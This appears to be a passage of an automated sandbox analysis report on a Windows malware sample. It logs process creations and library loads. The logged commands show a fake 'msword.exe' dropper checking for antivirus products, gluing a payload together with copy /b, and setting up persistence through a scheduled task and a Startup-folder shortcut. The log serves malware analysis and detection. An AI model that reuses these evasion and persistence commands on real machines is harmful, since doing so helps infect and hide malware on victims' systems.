Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 677826
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com Prostores.com N
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comSection loaded: winmm.dll
